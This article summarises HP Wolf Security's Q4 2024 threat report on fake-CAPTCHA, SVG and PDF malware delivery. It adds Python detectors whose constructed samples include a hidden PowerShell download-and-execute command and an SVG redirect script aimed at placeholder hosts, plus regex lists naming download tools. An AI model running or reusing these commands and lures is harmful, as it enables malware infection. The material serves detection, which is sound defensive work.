From fake CAPTCHAs to malware PDFs: The biggest cybersecurity risks right now

Learn how cybercriminals are using fake CAPTCHAs, weaponized PDFs, and SVG-based malware to target businesses. Stay informed with HP Wolf Security’s latest report.


Cybercriminals are deploying increasingly sophisticated tactics to bypass traditional security measures, as revealed in HP Wolf Security's latest Threat Insights Report – March 2025. Covering threats detected in Q4 2024, the report highlights the evolution of malware distribution, the increasing use of social engineering, and the growing reliance on stealthy infection techniques that exploit everyday digital interactions.

The findings indicate a troubling rise in fake CAPTCHA attacks, malicious SVG-based malware delivery, and weaponized PDF files, all designed to infiltrate enterprise systems and steal sensitive data. These emerging threats underscore the need for enhanced endpoint security, particularly as attackers refine their strategies to evade detection by email security gateways, firewalls, and antivirus solutions.

HP Wolf Security Report Uncovers Alarming Growth in Cyber Threats and Malware Evasion Tactics

How Are Fake CAPTCHA Attacks Spreading Malware?

One of the most concerning trends in Q4 2024 was the widespread use of fake CAPTCHA challenges to infect users with Lumma Stealer, an information-stealing malware family that exfiltrates saved passwords, cryptocurrency wallet data, and browser data. Cybercriminals have repurposed the familiar CAPTCHA verification step, intended to distinguish human users from bots, to talk users into running malicious commands themselves.

Victims are typically redirected to attacker-controlled websites through malicious advertisements, compromised web pages, or search engine poisoning. There, they are asked to complete what looks like a genuine CAPTCHA verification, which is in fact the opening step of a social engineering chain.

When the user clicks the fake CAPTCHA, JavaScript on the page silently copies a PowerShell command to the clipboard. The page then instructs them to open the Windows Run prompt (Win+R), paste the command, and press Enter, which downloads and executes the malware. No software vulnerability is exploited: the user runs the attacker's command under their own account, so the download looks like ordinary user-initiated PowerShell activity. The script installs Lumma Stealer, which establishes itself on the system and begins collecting credentials and other sensitive data.
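The command-line stage of this chain leaves a distinctive process-creation trail: a script host spawned by explorer.exe (which is what the Run prompt does), with a hidden window, a download primitive and an in-memory evaluation. The detector below is an added example and not code from HP Wolf Security or the report. It runs over constructed Sysmon-style process records embedded in the block (the host cdn.example-cloud.test, paths and timestamps are made up) and also decodes -EncodedCommand arguments, which would otherwise hide the download from plain string matching.

```python
"""Flag ClickFix-style launches: a script host spawned by explorer.exe (what the Run prompt
does) that downloads and evaluates remote code. Added example; records are constructed."""
import base64
import re

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')              # Key=Value or Key="quoted value"
DOWNLOAD_RE = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                         r"downloadfile|curl|wget|certutil|bitsadmin)\b", re.I)
EXEC_RE = re.compile(r"\b(iex|invoke-expression|start-process)\b", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-noni\b|-noninteractive\b", re.I)
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def parse_event(line: str) -> dict:
    """Parse one constructed process-creation record into a dict."""
    return {key: (quoted or bare) for key, quoted, bare in FIELD_RE.findall(line)}


def decode_encoded_command(cmd: str) -> str:
    """Recover the plaintext of a -EncodedCommand argument (base64 over UTF-16LE), or ''."""
    match = ENCODED_RE.search(cmd)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: dict) -> tuple:
    """Return (score, reasons); each independent indicator of the chain adds one point."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    if image not in SCRIPT_HOSTS:
        return 0, reasons                        # only shells and script hosts are of interest
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append("encoded command decoded: " + decoded[:60])
    text = cmd + " " + decoded                   # match on the visible and the decoded text
    if parent == "explorer.exe":
        reasons.append("script host spawned by explorer.exe (Run prompt / shell)")
    if DOWNLOAD_RE.search(text):
        reasons.append("download primitive on the command line")
    if EXEC_RE.search(text):
        reasons.append("in-memory execution of fetched content")
    if HIDDEN_RE.search(text):
        reasons.append("hidden window / no profile flags")
    if URL_RE.search(text):
        reasons.append("remote URL on the command line")
    return len(reasons), reasons


def detect(lines, threshold: int = 3) -> list:
    """Return an alert for every record whose score reaches the threshold."""
    alerts = []
    for index, line in enumerate(lines):
        event = parse_event(line)
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append({"index": index, "score": score, "reasons": reasons,
                           "command": event.get("CommandLine", "")})
    return alerts


# Constructed sample records (not real telemetry); cdn.example-cloud.test is a placeholder host.
_ENC = base64.b64encode("iwr https://cdn.example-cloud.test/v.txt | iex".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    # 0: the pasted ClickFix command: hidden PowerShell fetches and evaluates a remote script
    r'UtcTime=2024-12-03T10:14:22 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'ParentImage="C:\Windows\explorer.exe" '
    r'CommandLine="powershell -w hidden -c iwr https://cdn.example-cloud.test/verify.txt | iex"',
    # 1: benign user activity from the same shell
    r'UtcTime=2024-12-03T10:15:01 Image="C:\Windows\System32\notepad.exe" ParentImage="C:\Windows\explorer.exe" '
    r'CommandLine="notepad.exe C:\Users\alice\notes.txt"',
    # 2: scheduled admin script: a script host, but no download, eval or hiding, and not from the shell
    r'UtcTime=2024-12-03T10:20:00 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'ParentImage="C:\Windows\System32\svchost.exe" '
    r'CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"',
    # 3: the same download-and-run payload hidden behind -EncodedCommand
    r'UtcTime=2024-12-03T10:31:47 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'ParentImage="C:\Windows\explorer.exe" '
    r'CommandLine="powershell -nop -w hidden -enc ' + _ENC + '"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["index"], alert["score"], alert["command"][:70])
        for reason in alert["reasons"]:
            print("   -", reason)
```

The parent/child relationship is the strongest single signal: interactive PowerShell launched from explorer.exe is rare on managed endpoints, whereas the same command line under a scheduler or management agent is routine, which is why the scoring does not alert on record 2. The Run prompt also records what was pasted in the HKCU RunMRU registry key, so the same patterns can be applied to that value during forensics.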


The attackers' use of legitimate cloud hosting services to stage the payloads further complicates detection. Many security controls weigh domain reputation when deciding whether to block a download, and content hosted on a trusted cloud provider inherits that provider's reputation, so the fake CAPTCHA chain passes URL filtering that would have caught a newly registered domain.

Why Are Cybercriminals Using SVG Images for Malware Delivery?

HP Wolf Security also identified a significant increase in malware embedded within Scalable Vector Graphics (SVG) files. SVG is an XML format that can carry JavaScript, and an .svg file opens by default in the web browser, which runs that script; this makes the "image" a discreet loader for remote access trojans (RATs) and infostealers.

The attack chain begins when a user opens a malicious SVG received by email, downloaded from the web, or delivered through another channel. The browser executes the embedded JavaScript, which fetches or drops the next stage, so additional malware arrives without the alerts an executable attachment or a macro-enabled document would raise.
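A lightweight triage check for this delivery method, added here as an example and not HP Wolf Security's tooling, parses an SVG as XML and reports the constructs an image has no business containing: script elements, on* event-handler attributes, javascript: and non-image data: hrefs, and foreignObject, which can wrap arbitrary HTML. The two SVG documents in the block are constructed for the example; the "malicious" one only navigates to a placeholder host.

```python
"""Static triage of SVG files for script-bearing constructs. Added example (not HP Wolf
Security code); both sample documents are constructed for illustration."""
import xml.etree.ElementTree as ET

HTML_CARRIERS = {"foreignObject", "iframe", "embed", "object"}   # can wrap HTML inside an "image"


def _local(name: str) -> str:
    """Strip the namespace prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def scan_svg(data: bytes) -> list:
    """Return human-readable findings; an empty list means no active content was seen."""
    findings = []
    if b"<!ENTITY" in data:
        findings.append("DTD with entity declarations (entity expansion / XXE surface)")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return findings + [f"not well-formed XML: {exc}"]
    for element in root.iter():
        tag = _local(element.tag)
        if tag == "script":
            src = next((v for k, v in element.attrib.items() if _local(k) == "href"), None)
            if src:
                findings.append(f"<script> loads external code from {src}")
            elif (element.text or "").strip():
                findings.append(f"inline <script> with {len(element.text.strip())} chars of JavaScript")
        if tag in HTML_CARRIERS:
            findings.append(f"<{tag}> element can embed HTML content")
        for attr, value in element.attrib.items():
            name = _local(attr)
            if name.lower().startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            if name == "href":
                lowered = value.strip().lower()
                if lowered.startswith("javascript:"):
                    findings.append(f"javascript: URL on <{tag}>")
                elif lowered.startswith("data:") and not lowered.startswith("data:image/"):
                    findings.append(f"non-image data: URL on <{tag}>: {lowered[:40]}")
    return findings


def is_suspicious(data: bytes) -> bool:
    """Gate for a mail or download pipeline: any finding means quarantine for a closer look."""
    return bool(scan_svg(data))


# Constructed samples. The "malicious" one is a stub that only navigates to a placeholder host.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 120 120">
  <circle cx="60" cy="60" r="50" fill="steelblue"/>
  <text x="20" y="66" fill="white">Invoice</text>
</svg>"""

MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="640" height="400" onload="stage()">
  <rect width="100%" height="100%" fill="#f4f4f4"/>
  <text x="24" y="48">The document is protected. Click below to view.</text>
  <a xlink:href="javascript:stage()"><text x="24" y="96" fill="blue">Open document</text></a>
  <script><![CDATA[
    function stage() {
      // a real lure would assemble an obfuscated URL and fetch the next stage;
      // this placeholder only navigates to a made-up host
      var parts = ["cdn", "example-cloud", "test"];
      location.href = "https://" + parts.join(".") + "/next-stage.js";
    }
  ]]></script>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_SVG), ("lure", MALICIOUS_SVG)):
        print(label, "->", scan_svg(doc) or "clean")
```

A parse failure is reported rather than ignored: a file that is not well-formed XML is not a usable image either, so there is no legitimate reason for it to reach a user. The check is static and does not evaluate the script, so obfuscation does not help the attacker; the presence of any script in an image attachment is the finding.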

HP Wolf Security observed that seven distinct RATs were deployed using this method in Q4 2024, including DCRat, AsyncRAT, XWorm, and VenomRAT. By distributing multiple strains of malware, cybercriminals ensure redundancy and persistence, increasing the likelihood of a successful infection even if some payloads are detected and removed.

A key feature of this campaign was the use of obfuscated Python scripts to deliver the final malware stage. The growing popularity of Python for AI and data science applications has inadvertently made it an attractive language for cybercriminals. Since Python interpreters are commonly installed on enterprise machines, attackers can use them to execute malware with minimal suspicion.


To evade detection, these scripts issue direct system calls instead of going through the documented Windows API functions that endpoint security products hook in user mode. Behaviour-based detection that watches those API calls therefore never sees the activity; the attack runs one layer below the monitoring, which makes it harder to intercept. The practical caveat for defenders is that user-mode API hooking alone is not enough here: kernel-level telemetry (process creation, network and file events from the kernel or ETW) still observes the processes and connections the payload produces.

How Are Attackers Targeting Engineering Firms with Malicious PDFs?

HP Wolf Security also documented a malware campaign using PDF documents to target engineering companies in the Asia-Pacific region. In this attack, cybercriminals disguised malicious PDFs as quotation requests, tailoring their phishing emails based on the recipient’s industry, such as automobile manufacturing and industrial parts supply.

When victims opened these PDF attachments, they were shown a blurred image and a message claiming either that an updated PDF reader was required or that the document had been compressed for security reasons. Clicking the image followed a link to a download of a ZIP archive containing an IMG disk image; Windows mounts such an image as a drive letter when it is opened, presenting the malware inside as an ordinary file.

Once executed, this file installed , a powerful malware strain designed to record keystrokes, extract saved credentials, and capture clipboard data. The weaponization of PDF documents demonstrates how attackers continue to refine their phishing strategies to maximize credibility and engagement.

Notably, this technique can bypass email security scanners, which often do not unpack nested containers such as a ZIP archive holding an IMG disk image (IMG is a disk image rather than a compression format, but the effect is the same: the payload sits one layer deeper than the scanner looks). Since many businesses routinely receive quotation requests by email, the targeted pretext raises the odds of a successful infection.
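The click on the blurred image is a link annotation whose action is a URI, and a scanner that only pattern-matches the raw file misses it when the annotation sits inside a compressed object stream or the URI is written as a hex string. The Python scanner below is an added example (not HP Wolf Security's code) that inflates FlateDecode streams, handles both string encodings, and separates out link targets ending in an archive or executable extension; the sample PDF it inspects is built in code, and cdn.example-cloud.test is a placeholder host.

```python
"""Pull link and action targets out of a PDF, looking inside FlateDecode streams and hex
strings as well as the raw file. Added example; the sample document is built in code."""
import re
import zlib

STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.S)
URI_LITERAL_RE = re.compile(rb"/URI\s*\(((?:[^()\\]|\\.)*)\)", re.S)   # /URI (literal string)
URI_HEX_RE = re.compile(rb"/URI\s*<([0-9A-Fa-f\s]*)>")                  # /URI <hex string>
ACTION_RE = re.compile(rb"/S\s*/(URI|Launch|JavaScript|GoToR|SubmitForm)\b")
OPEN_RE = re.compile(rb"/(OpenAction|AA)\b")                             # fires without a click
DOWNLOAD_EXTS = (".zip", ".rar", ".7z", ".iso", ".img", ".exe", ".msi", ".js", ".vbs", ".hta")


def _unescape_literal(raw: bytes) -> str:
    """Undo PDF literal-string escapes: \\( \\) \\\\ and octal \\ddd."""
    def repl(m):
        g = m.group(1)
        return bytes([int(g, 8) & 0xFF]) if all(0x30 <= c <= 0x37 for c in g) else g
    return re.sub(rb"\\([0-7]{1,3}|.)", repl, raw, flags=re.S).decode("latin-1")


def _views(data: bytes):
    """Yield the raw bytes, then the content of every stream that inflates cleanly."""
    yield data
    for match in STREAM_RE.finditer(data):
        inflater = zlib.decompressobj()
        try:
            body = inflater.decompress(match.group(1))
        except zlib.error:
            continue                      # not Flate (e.g. a DCT image) or corrupt
        if inflater.eof:                  # complete stream; trailing newline is ignored
            yield body


def scan_pdf(data: bytes) -> dict:
    """Collect URI targets, action types and whether anything fires on open."""
    uris, actions, open_action = [], {}, False
    for view in _views(data):
        uris += [_unescape_literal(m.group(1)) for m in URI_LITERAL_RE.finditer(view)]
        for m in URI_HEX_RE.finditer(view):
            try:
                uris.append(bytes.fromhex(m.group(1).decode("ascii")).decode("latin-1"))
            except ValueError:
                continue                  # odd-length or malformed hex
        for m in ACTION_RE.finditer(view):
            kind = m.group(1).decode("ascii")
            actions[kind] = actions.get(kind, 0) + 1
        open_action = open_action or bool(OPEN_RE.search(view))
    return {"uris": uris, "actions": actions, "open_action": open_action}


def download_links(result: dict) -> list:
    """URIs whose path ends in an archive or executable extension (the 'updated reader' lure)."""
    return [u for u in result["uris"] if u.lower().split("?", 1)[0].endswith(DOWNLOAD_EXTS)]


def build_sample_pdf() -> bytes:
    """Constructed PDF skeleton (not a real sample; cdn.example-cloud.test is a placeholder).
    One link annotation sits inside a FlateDecode stream, the other uses a hex-encoded URI."""
    uri_a = b"https://cdn.example-cloud.test/Quotation_RFQ.zip"
    uri_b = b"https://cdn.example-cloud.test/reader-update.zip"
    annot_a = (b"7 0 obj\n<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] "
               b"/A << /S /URI /URI (" + uri_a + b") >> >>\nendobj\n")
    packed = zlib.compress(annot_a)
    annot_b = (b"9 0 obj\n<< /Type /Annot /Subtype /Link /Rect [0 0 612 120] "
               b"/A << /S /URI /URI <" + uri_b.hex().encode("ascii") + b"> >> >>\nendobj\n")
    return (b"%PDF-1.7\n"
            b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
            b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
            b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] "
            b"/Annots [7 0 R 9 0 R] >>\nendobj\n"
            b"8 0 obj\n<< /Filter /FlateDecode /Length " + str(len(packed)).encode("ascii")
            + b" >>\nstream\n" + packed + b"\nendstream\nendobj\n"
            + annot_b
            + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    report = scan_pdf(build_sample_pdf())
    print("actions:", report["actions"], "| fires on open:", report["open_action"])
    for uri in download_links(report):
        print("download link:", uri)
```

A full-page link annotation over an image, with a target that ends in .zip, .img or .exe, is the signature of this lure and is worth a mail-gateway rule on its own, independent of whether the archive it points to can be unpacked. The scanner deliberately does not follow the link; the interesting fact is that a document offered as a quotation request wants to fetch an archive at all.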

What Do These Trends Reveal About the Future of Cybersecurity?

The HP Wolf Security Threat Insights Report highlights an ongoing shift in cybercriminal tactics, as attackers increasingly exploit user psychology, web-based vulnerabilities, and trusted digital services. Several key trends emerge from the findings:

  • Email remains the dominant malware delivery vector, accounting for 53% of threats blocked by HP Sure Click in Q4 2024. Despite advances in email filtering, attackers continue to get through with well-crafted phishing campaigns.
  • Web-based threats are on the rise, with 27% of infections originating from browser downloads, which underscores the need for web security controls that neutralise threats before they reach endpoints.
  • Attackers are diversifying delivery mechanisms: compressed archives (32%) and script-based infections (43%) play a central role in malware distribution, and the continued weaponisation of documents, including PDFs and Microsoft Office files, remains a significant challenge for businesses.

Given these evolving threats, cybersecurity experts emphasize the importance of proactive defense measures. HP Wolf Security recommends:

  • Disabling clipboard sharing where it is not needed, so that a web page cannot plant a command for the user to paste; this removes the mechanism the fake CAPTCHA chain depends on.
  • Restricting access to the Windows Run prompt (Win+R), for example through the Explorer "NoRun" policy, to block the paste-and-execute step of PowerShell-based infections.
  • Strengthening endpoint security through containerized application isolation, so that a document, link or download that does turn out to be malicious runs inside a disposable virtual machine and cannot reach the host.

By adopting multi-layered cybersecurity strategies, organizations can reduce their attack surface and stay ahead of emerging threats. As cybercriminals continue to refine their evasion techniques, businesses must remain vigilant and proactive in safeguarding their digital ecosystems.

